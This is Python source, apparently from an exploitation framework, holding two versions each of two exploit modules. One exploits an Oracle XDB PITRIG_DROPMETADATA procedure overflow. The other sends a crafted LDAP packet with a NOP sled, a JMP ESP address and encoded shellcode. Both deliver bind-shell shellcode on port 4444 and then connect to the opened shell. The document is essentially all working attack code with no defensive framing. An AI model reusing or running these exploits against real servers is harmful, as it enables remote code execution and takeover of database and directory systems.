def run(self): if self.target == "" or self.target is None: self.target = "localhost" if self.port == 0 or self.port is None: self.port = 1521 if self.ostype < 1: self.gom.echo("[+] No OS selected. Using Linux (ostype = 1)") self.ostype = 1 if self.sid == "": self.gom.echo("[+] No sid selected, using ORCL") self.sid = "ORCL" if self.payload < 1: self.gom.echo( "[+] No payload selected. Using 'bindshell' (payload = 2)") self.payload = 2 if self.listenPort == 0: self.gom.echo("[+] No listen port selected, using 4444") self.listenPort = 4444 link = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))" % ( self.user, self.password, self.target, self.port) link += "(CONNECT_DATA=(SERVICE_NAME=%s)))" % self.sid self.gom.echo(link) connection = cx_Oracle.connect(link) connection.rollback() connection.commit() cur = connection.cursor() adjustSize = 506 sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload) sc = x86XorEncode(sc) self.gom.echo("[+] Len of encoded shellcode is", len(sc)) sc = chr(0x27) * (adjustSize - len(sc)) + sc addr = "BBBB" data = sc data += addr data += data + "\x27" * (len(data) - 1024) cur.execute( "BEGIN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(OWNER=>:1,NAME=>:2); END;", (data, data)) self.gom.echo("[+] Exploit sended. Connecting to port", self.listenPort) time.sleep(3) spawnTerminal("localhost", self.listenPort) return True
def run(self): if self.target == "" or self.target is None: self.target = "localhost" if self.port == 0 or self.port is None: self.port = 1521 if self.ostype < 1: print "[+] No OS selected. Using Linux (ostype = 1)" self.ostype = 1 if self.sid == "": print "[+] No sid selected, using ORCL" self.sid = "ORCL" if self.payload < 1: print "[+] No payload selected. Using 'bindshell' (payload = 2)" self.payload = 2 if self.listenPort == 0: print "[+] No listen port selected, using 4444" self.listenPort = 4444 link = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))" % ( self.user, self.password, self.target, self.port, ) link += "(CONNECT_DATA=(SERVICE_NAME=%s)))" % self.sid print link connection = cx_Oracle.connect(link) connection.rollback() connection.commit() cur = connection.cursor() adjustSize = 506 sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload) sc = x86XorEncode(sc) print "[+] Len of encoded shellcode is", len(sc) sc = chr(0x27) * (adjustSize - len(sc)) + sc addr = "BBBB" data = sc data += addr data += data + "\x27" * (len(data) - 1024) cur.execute("BEGIN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(OWNER=>:1,NAME=>:2); END;", (data, data)) print "[+] Exploit sended. Connecting to port", self.listenPort time.sleep(3) spawnTerminal("localhost", self.listenPort) return True
def run(self): if self.target == "" or self.target is None: self.target = "localhost" if self.port == 0 or self.port is None: self.port = 389 if self.ostype < 1: self.gom.echo("[+] No OS selected. Using Linux (ostype = 1)") self.ostype = 1 if self.payload < 1: self.gom.echo( "[+] No payload selected. Using 'bindshell' (payload = 2)") self.payload = 2 if self.listenPort == 0: self.gom.echo("[+] No listen port selected, using 4444") self.listenPort = 4444 adjustSize = 243 sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload) sc = x86AlphaEncode(sc) sc = "\x90" * (adjustSize - len(sc)) + sc # # The address we will use is 0xffffe777 (JMP ESP in Debian's linux-gate.so) # addr = "\x77\xe7\xff\xff" theLine = '\x90' * 2076 + addr + '\x90' * (2019 - len(sc)) + sc pkt = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc=' pkt += theLine pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00' socket.setdefaulttimeout(self.timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.target, self.port)) s.send(pkt) s.close() self.gom.echo("[+] Exploit sended. Connecting to port", self.listenPort) time.sleep(3) spawnTerminal("localhost", self.listenPort) return True
def run(self): if self.target == "" or self.target is None: self.target = "localhost" if self.port == 0 or self.port is None: self.port = 389 if self.ostype < 1: print "[+] No OS selected. Using Linux (ostype = 1)" self.ostype = 1 if self.payload < 1: print "[+] No payload selected. Using 'bindshell' (payload = 2)" self.payload = 2 if self.listenPort == 0: print "[+] No listen port selected, using 4444" self.listenPort = 4444 adjustSize = 243 sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload) sc = x86AlphaEncode(sc) sc = "\x90"*(adjustSize-len(sc)) + sc # # The address we will use is 0xffffe777 (JMP ESP in Debian's linux-gate.so) # addr = "\x77\xe7\xff\xff" theLine = '\x90'*2076 + addr+ '\x90'*(2019-len(sc)) + sc pkt = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc=' pkt += theLine pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00' socket.setdefaulttimeout(self.timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.target, self.port)) s.send(pkt) s.close() print "[+] Exploit sended. Connecting to port", self.listenPort time.sleep(3) spawnTerminal("localhost", self.listenPort) return True